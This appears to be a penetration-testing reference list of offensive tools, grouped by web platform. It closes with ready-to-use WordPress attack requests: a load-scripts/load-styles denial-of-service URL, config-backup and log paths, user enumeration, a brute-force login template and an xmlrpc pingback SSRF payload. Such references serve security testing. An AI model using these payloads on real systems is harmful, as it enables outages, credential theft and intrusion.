Web Technologies

Adobe AEM

Apache Web Server

  • apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir module.

APIs

GraphQL

ASP.NET

Cloudflare

Drupal

Firebase

Firebird

Flask

Google Web Toolkit

.htaccess File

  • htshells - htshells is a series of web-based attacks built around .htaccess files. Most of them fall into two categories: remote code/command execution and information disclosure.

HTTP/2

IIS

Java Applets

  • Advanced Penetration Testing: Using the Java Applet for Payload Delivery - pg. 31

JavaScript

  • JSScanner - Scan JS files for endpoints and secrets.
  • JSFScan.sh - Automation for JavaScript recon in bug bounty.
  • jshole - A JavaScript components vulnerability scanner, based on RetireJS.
  • Retire.JS - Burp/ZAP/Maven extension that integrates the Retire.js repository to find vulnerable JavaScript libraries.
  • JSshell - JavaScript reverse/remote shell from XSS.
  • unmap - Unpack a JavaScript source map back into a filesystem structure.
  • JSA - JavaScript security analysis (JSA) is a program for JavaScript analysis during web application security assessments.

JBoss

  • jexboss - JexBoss: JBoss (and Java deserialization vulnerabilities) verification and exploitation tool.
  • jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Jenkins

Jira

Joomla

  • JCS - JCS (Joomla Component Scanner) is made for penetration testing purposes on Joomla CMS.
  • Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
  • juumla - Juumla is a Python tool created to identify the Joomla version, scan for vulnerabilities and search for config files.

JSON Web Tokens

Magento

MSExchange

OAuth 2.0

OneLogin - SAML

  • SAMLExtractor - A tool that takes a URL or a list of URLs and prints back the SAML consume URL.

OWA/O365

PHP

  • Chankro - Bypass disable_functions and open_basedir in your pentests.
  • phpggc - A library of PHP unserialize() payloads along with a tool to generate them, from the command line or programmatically.

Redis

Ruby on Rails

SAP

SSL/TLS and Certificates

Virtual Hosts

  • virtual-host-discovery - A script to enumerate virtual hosts on a server.
  • vhosts-sieve - Searching for virtual hosts among non-resolvable domains.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detects catch-all scenarios, and works around wildcards, aliases and dynamic default pages.

VPN

  • ike-scan - Discover and fingerprint IKE hosts (IPsec VPN servers).
  • Kali Linux - An Ethical Hacker's Cookbook, pg. 24

Web Application Firewalls

WebDav

  • davtest - Scan the given WebDAV server.
    $ davtest -move -sendbd auto -url http://$ip:8080/webdav/
  • cadaver - A command-line WebDAV client for Unix.
    $ cadaver http://$ip:8080/webdav/

Web Proxies

WordPress

WordPress Common Bugs

  • Denial of Service via load-scripts.php
    http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
  • Denial of Service via load-styles.php
    http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
  • Log files exposed
    http://target.com/wp-content/debug.log
  • Backup file wp-config exposed
    .wp-config.php.swp
    wp-config.inc
    wp-config.old
    wp-config.txt
    wp-config.html
    wp-config.php.bak
    wp-config.php.dist
    wp-config.php.inc
    wp-config.php.old
    wp-config.php.save
    wp-config.php.swp
    wp-config.php.txt
    wp-config.php.zip
    wp-config.php.html
    wp-config.php~
  • Information disclosure: WordPress usernames
    http://target.com/?author=1
    http://target.com/wp-json/wp/v2/users
    http://target.com/?rest_route=/wp/v2/users
  • Bruteforce in wp-login.php
    POST /wp-login.php HTTP/1.1
    Host: target.com

    log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
  • XSPA in WordPress (xmlrpc.php pingback)
    POST /xmlrpc.php HTTP/1.1
    Host: target.com

    <methodCall>
    <methodName>pingback.ping</methodName>
    <params><param>
    <value><string>http://yourip:port</string></value>
    </param><param>
    <value>
    <string>https://target.com/</string>
    </value>
    </param></params>
    </methodCall>